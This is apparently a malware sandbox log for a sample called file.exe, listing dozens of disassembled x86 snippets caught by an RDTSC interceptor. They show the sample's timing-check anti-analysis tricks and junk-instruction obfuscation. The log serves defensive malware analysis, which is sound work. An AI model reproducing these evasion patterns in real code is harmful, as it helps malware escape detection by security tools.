                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11505E6 second address: 1150624 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F020CB28446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F020CB2844Ch 0x00000012 jmp 00007F020CB2844Fh 0x00000017 popad 0x00000018 jmp 00007F020CB28452h 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115102E second address: 1151048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F020CB267F4h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1151048 second address: 1151072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F020CB2844Dh 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e jmp 00007F020CB28453h 0x00000013 pop eax 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1151072 second address: 1151078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11511C3 second address: 11511F4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F020CB28446h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F020CB2848Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007F020CB28446h 0x0000001a jmp 00007F020CB28457h 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11511F4 second address: 11511FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11511FA second address: 1151206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155E8C second address: 1155E90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155E90 second address: 1155E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155E96 second address: 1155E9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1156309 second address: 1156310 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115541A second address: 1155420 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11578EB second address: 11578F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11578F1 second address: 11578F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11578F9 second address: 1157906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F020CB28446h 0x0000000c popad 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1157906 second address: 115790B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112394F second address: 1123953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115D78B second address: 115D78F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115D904 second address: 115D944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F020CB28446h 0x0000000a popad 0x0000000b jmp 00007F020CB28452h 0x00000010 jng 00007F020CB28448h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 pushad 0x00000019 jc 00007F020CB28446h 0x0000001f jmp 00007F020CB28452h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115E1A9 second address: 115E1AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115E1AD second address: 115E1CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB28459h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115E291 second address: 115E2C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F020CB267F8h 0x00000008 jbe 00007F020CB267E6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F020CB267EAh 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115E2C5 second address: 115E2FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB28459h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c jne 00007F020CB2844Ch 0x00000012 pushad 0x00000013 jmp 00007F020CB2844Bh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115E756 second address: 115E75A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115E864 second address: 115E868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115E868 second address: 115E87A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jl 00007F020CB267E6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115E87A second address: 115E882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115EF1A second address: 115EF1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115EF1E second address: 115EF27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115EF27 second address: 115EF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F020CB267E8h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115F0D3 second address: 115F0D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115F0D8 second address: 115F0E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F020CB267E6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115F253 second address: 115F258 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115F258 second address: 115F26A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F020CB267E8h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115F26A second address: 115F26F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115F331 second address: 115F337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115F5FE second address: 115F602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115F602 second address: 115F611 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F020CB267E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1160C30 second address: 1160C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1161D65 second address: 1161D69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116489F second address: 11648A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11648A4 second address: 11648AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F020CB267E6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11648AE second address: 11648CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB28455h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11648CF second address: 11648D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11625EB second address: 1162608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F020CB28459h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1169F34 second address: 1169F77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 add bx, F745h 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122D260Ah], ebx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F020CB267E8h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 00000015h 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 movzx ebx, di 0x00000035 sub dword ptr [ebp+122D2B67h], ebx 0x0000003b xchg eax, esi 0x0000003c pushad 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1169F77 second address: 1169F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F020CB28450h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116AF05 second address: 116AF1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F020CB267ECh 0x0000000b popad 0x0000000c push eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116AF1D second address: 116AF21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116AF21 second address: 116AFBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F020CB267E8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 jng 00007F020CB267ECh 0x00000028 or dword ptr [ebp+1247BF0Dh], ebx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F020CB267E8h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 0000001Dh 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a mov edi, dword ptr [ebp+122D370Dh] 0x00000050 mov bl, 6Bh 0x00000052 push 00000000h 0x00000054 mov di, dx 0x00000057 xchg eax, esi 0x00000058 jns 00007F020CB267FBh 0x0000005e push eax 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F020CB267F8h 0x00000067 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116BF2C second address: 116BF32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116BF32 second address: 116BF3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116F04B second address: 116F055 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F020CB2844Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116F055 second address: 116F0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F020CB267F1h 0x0000000c nop 0x0000000d jmp 00007F020CB267EFh 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 pop ebx 0x00000016 push 00000000h 0x00000018 jc 00007F020CB267E6h 0x0000001e xchg eax, esi 0x0000001f jl 00007F020CB267F0h 0x00000025 jmp 00007F020CB267EAh 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116F0A0 second address: 116F0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F020CB2844Ch 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116B215 second address: 116B232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C179 second address: 116C17F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116D1A4 second address: 116D1A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116B232 second address: 116B251 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB28455h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116B251 second address: 116B25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F020CB267E6h 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1170096 second address: 11700A0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F020CB2844Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11700A0 second address: 1170124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F020CB267EBh 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F020CB267E8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 movzx edi, ax 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F020CB267E8h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000015h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 mov dword ptr [ebp+122D231Fh], eax 0x0000004c push 00000000h 0x0000004e or dword ptr [ebp+122D2B67h], esi 0x00000054 xchg eax, esi 0x00000055 pushad 0x00000056 push ecx 0x00000057 jmp 00007F020CB267EBh 0x0000005c pop ecx 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F020CB267F2h 0x00000064 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1170124 second address: 1170128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1170128 second address: 117014B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F020CB267F2h 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F020CB267E6h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117115C second address: 11711EB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F020CB28446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F020CB28448h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 call 00007F020CB28451h 0x0000002a call 00007F020CB2844Ah 0x0000002f jmp 00007F020CB2844Eh 0x00000034 pop ebx 0x00000035 pop ebx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007F020CB28448h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 0000001Ch 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 push esi 0x00000055 mov dword ptr [ebp+1247D4C1h], edx 0x0000005b pop edi 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 push ebx 0x00000062 pop ebx 0x00000063 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11711EB second address: 11711F1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117212B second address: 1172131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1172131 second address: 1172135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1172135 second address: 11721D3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jc 00007F020CB28454h 0x0000000f pushad 0x00000010 jng 00007F020CB28446h 0x00000016 jc 00007F020CB28446h 0x0000001c popad 0x0000001d nop 0x0000001e ja 00007F020CB2845Ah 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push eax 0x00000029 call 00007F020CB28448h 0x0000002e pop eax 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 add dword ptr [esp+04h], 0000001Ch 0x0000003b inc eax 0x0000003c push eax 0x0000003d ret 0x0000003e pop eax 0x0000003f ret 0x00000040 clc 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push ecx 0x00000046 call 00007F020CB28448h 0x0000004b pop ecx 0x0000004c mov dword ptr [esp+04h], ecx 0x00000050 add dword ptr [esp+04h], 00000019h 0x00000058 inc ecx 0x00000059 push ecx 0x0000005a ret 0x0000005b pop ecx 0x0000005c ret 0x0000005d xchg eax, esi 0x0000005e jno 00007F020CB28450h 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 jc 00007F020CB28448h 0x0000006d push eax 0x0000006e pop eax 0x0000006f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11730CB second address: 1173145 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F020CB267E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F020CB267E8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007F020CB267E8h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 00000014h 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 mov bh, cl 0x00000045 push 00000000h 0x00000047 push 00000000h 0x00000049 push edi 0x0000004a call 00007F020CB267E8h 0x0000004f pop edi 0x00000050 mov dword ptr [esp+04h], edi 0x00000054 add dword ptr [esp+04h], 00000018h 0x0000005c inc edi 0x0000005d push edi 0x0000005e ret 0x0000005f pop edi 0x00000060 ret 0x00000061 mov ebx, dword ptr [ebp+12482F2Ch] 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c pop eax 0x0000006d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1173145 second address: 1173149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1175193 second address: 117519D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F020CB267E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117519D second address: 11751A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1175FAD second address: 1175FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117333F second address: 1173345 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1173345 second address: 117334F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F020CB267ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1172338 second address: 1172351 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F020CB28454h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11752D6 second address: 11752DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11752DA second address: 11752E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117141B second address: 1171426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
